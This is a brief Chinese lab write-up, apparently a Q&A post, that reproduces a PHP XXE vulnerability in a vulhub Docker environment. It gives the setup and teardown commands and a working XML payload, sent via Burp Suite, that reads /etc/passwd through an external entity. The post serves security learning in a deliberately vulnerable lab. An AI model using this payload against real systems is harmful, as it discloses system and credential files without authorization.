这个实验比较简单,就复现一个XXE漏洞,读取passwd文件,其中执行系统命令、内网探测不好复现。XXE(XML External Entity,XML 外部实体注入)当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞
docker-compose build //可选docker-compose up -d完成试验后,记得删除漏洞环境哦~~
docker-compose downdocker system prune -a -f //可选简单访问一下,说明PHP XXE漏洞环境搭建成功了
掏出burpsuite,构造GET请求,读取本地文件
<?xml version = "1.0"?><!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>